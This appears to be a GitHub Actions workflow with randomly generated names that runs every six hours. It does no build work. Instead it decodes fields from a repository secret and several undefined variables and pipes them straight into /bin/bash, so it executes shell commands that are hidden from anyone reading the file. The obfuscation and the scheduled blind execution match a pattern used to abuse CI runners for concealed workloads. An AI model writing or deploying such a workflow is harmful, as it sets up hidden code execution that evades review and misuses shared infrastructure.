name: lifupi9218
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lifupi9218
        env:
          im24667: ${{ secrets.im24667 }}
        run: |
          echo $im24667 | jq -r .snvx87532 | /bin/bash
          echo $vdla7562 | jq -r .gtxsn439 | /bin/bash
          echo $fgzgw57 | jq -r .ymq1957 | /bin/bash
          echo $z64 | jq -r .ta6676 | /bin/bash

